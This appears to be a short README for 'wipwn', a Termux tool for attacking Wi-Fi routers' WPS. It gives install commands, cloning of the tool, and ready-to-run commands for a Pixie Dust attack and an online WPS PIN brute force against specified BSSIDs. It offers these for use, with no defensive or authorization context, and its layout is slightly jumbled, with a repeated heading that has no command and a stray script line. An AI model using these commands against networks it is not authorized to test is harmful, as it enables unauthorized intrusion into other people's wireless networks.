- [Requirements]
pkg update && pkg upgrade -y
pkg install root-repo -y
pkg install git tsu python wpa-supplicant pixiewps iw -y
git clone https://github.com/anbuinfosec/wipwn
cd wipwn
chmod +x main.py
- First turn off your Wifi.
- Turn on Hotspot.
- Turn on Location.
- Show avaliable networks and start Pixie Dust attack on a specified network.
sudo python main.py -i wlan0 -K
bash wipwn.sh
-
- Start Pixie Dust attack on a specified BSSID:
sudo python main.py -i wlan0 -b 00:91:4C:C3:AC:28 -K
- Start Pixie Dust attack on a specified BSSID:
- Launch online WPS bruteforce with the specified first half of the PIN:
sudo python main.py -i wlan0 -b 50:0F:F5:B0:08:05 -B -p 1234
"Device or resource busy (-16)" - Turn on Wifi and Then Turn off Wifi.